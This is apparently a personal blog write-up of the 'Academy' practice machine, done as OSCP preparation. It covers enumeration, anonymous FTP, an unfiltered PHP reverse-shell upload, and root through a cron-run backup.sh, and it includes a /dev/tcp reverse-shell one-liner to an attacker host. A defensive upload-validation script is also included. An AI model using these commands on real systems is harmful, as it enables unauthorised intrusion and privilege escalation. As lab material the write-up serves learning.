Academy box — Walkthrough

Cursemagic
5 min read · Dec 18, 2023


Hi guys, this is the third day and the third box (3D-3B, for my personal reference). I will try to complete at least one box per day (two or more if I can) so I can gain confidence, learn new things, and prepare for the OSCP.

Wish me luck!

So, today I would like to work on the Academy machine. Let’s get started!

Please read to the end! Thank you!

The box

Let’s get started!

Enumeration

Nmap, the same old-fashioned way.

nmap -p- -T4 <Target_IP> -A -sV -oN nmap.txt

Looks like FTP is an open gate, so we shall dive into it first!

FTP

We can simply log in to the FTP server with the username “anonymous” and the password “password”. There we can see a note.txt, which we download to our machine to see if it is helpful to us!

Note.txt

After opening it on our machine, it looks like we have a gold mine! We can see some SQL lines that try to insert new info into the database. From here we can also see that:
1. We will need to use the StudentRegno to log in SOMEWHERE
2. There is a password hash and a StudentRegno provided in the file
3. New names appear, such as Heath, Grimmie and jdelta.
These might come in handy later on.

Port 80 — Http

Nothing to see here. So, we are going to go and find it!

Gobuster

Fire it up!

gobuster dir -u http://<Target_IP>/ -w <Wordlist_Path>

/phpmyadmin

I found this login page but I am not sure whether we need it for now. Just keep it in mind for now.

/academy

Once we go to /academy, we can see this online course registration page. This is possibly where we will use the credentials from Note.txt.

Initial foothold?

I ran the password hash through CrackStation and got the result for the hash, which is student.

Then we can try to log in, and this is the page after logging in.

After navigating for a moment, I found that MY PROFILE provides a place to upload a picture. I am confident this is my chance!

Crafting Payload or just changing the extension?

Now craft (or just copy from Google) a PHP reverse shell that we can upload here. Remember to change the IP and the port to your desired ones. So, let’s try it!

Note: Please remember to set up a listener to receive the reverse connection. Also, during photo uploads we are usually only able to upload image-related extensions such as jpg or jpeg, but in this case the upload does not filter out any extension, which saves us time.
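The filter the note above says is missing, written from the defender's side as an added example (not code from the original post or from the box): a Python validator that accepts a profile picture only if its extension is on an allowlist and its content starts with the magic bytes of that type, and that throws away the client-supplied filename. The allowlist, size limit and sample inputs are constructed for this example.

```python
import os
import secrets

# Allowed extensions and the magic bytes a file of that type must start with
# (constructed allowlist for the example; extend per application needs).
ALLOWED_TYPES = {
    ".jpg":  (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png":  (b"\x89PNG\r\n\x1a\n",),
    ".gif":  (b"GIF87a", b"GIF89a"),
}
MAX_SIZE = 2 * 1024 * 1024  # 2 MiB upper bound for a profile picture


def validate_image_upload(filename, data):
    """Return (accepted, reason, stored_name).

    1. Reduce the client-supplied name to a basename so it cannot steer the
       write path (e.g. "../../x.jpg" becomes "x.jpg").
    2. Only the final extension counts, and it must be on the allowlist, so
       "shell.php" is rejected outright.
    3. The content must carry the magic bytes of the declared type, so a
       PHP payload renamed to "shell.php.jpg" is rejected as well.
    4. The server picks its own random filename; the name the client sent
       never reaches the web root.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_TYPES:
        return False, "extension not on allowlist: %r" % ext, None
    if len(data) > MAX_SIZE:
        return False, "file too large", None
    if not any(data.startswith(magic) for magic in ALLOWED_TYPES[ext]):
        return False, "content does not match declared type %s" % ext, None
    stored_name = secrets.token_hex(16) + ext
    return True, "ok", stored_name


if __name__ == "__main__":
    # Constructed sample uploads: one real-looking PNG header, and two
    # attempts to smuggle a PHP file past the check.
    samples = [
        ("avatar.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
        ("shell.php", b"<?php echo 1; ?>"),
        ("shell.php.jpg", b"<?php echo 1; ?>"),
    ]
    for name, content in samples:
        print(name, "->", validate_image_upload(name, content)[:2])
```

The upload directory should additionally be served with script execution disabled, so that even a polyglot file with a valid image header cannot run if the web server is misconfigured.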

It did not trigger the shell, but not to worry, we can just trigger it ourselves. We can go to the source code and see where the “picture” that was just uploaded is.

Now, update our URL and we will be able to see the “picture”.

Now we click on it to trigger the reverse shell. Yes, SHELL!

Now, we can upgrade our shell to a more stable shell.

python -c 'import pty; pty.spawn("/bin/bash")'

And we get these:

Exploration time!

Now, we need to navigate around the system to see what we can find. I found the grimmie user, and also found backup.sh.

backup.sh

It looks like this .sh can be used to escalate our privileges, as it runs on #!/bin/bash.

/etc/crontab

It looks OK, without anything that we can exploit.

/includes

This is in the path /var/www/html/academy/. As we can see from here, there is a config.php that might have useful information for us.

config.php

Nice find on the MySQL password and user!

Tried to use it but it failed, so maybe we should try it on SSH?

BECOME GRIMMIE AND ROOT?

Now, we should edit backup.sh and make it send us a reverse shell with admin privileges.

/bin/sh -i >& /dev/tcp/<Attacker_IP>/<PORT> 0>&1

Note: Remember to set up your listener.

Now, wait for a moment and we get a connection! It is root!

Voila! Another room done!

Thank you for reading my write-up. I would like to improve my write-up skills in the future, and you can reach me through Twitter or the comments. Any sponsors are also welcome.

Twitter: https://twitter.com/curse_jk

Buy me a coffee: http://buymeacoffee.com/Cursemagic

Other medium write-ups: https://cursemagic.medium.com
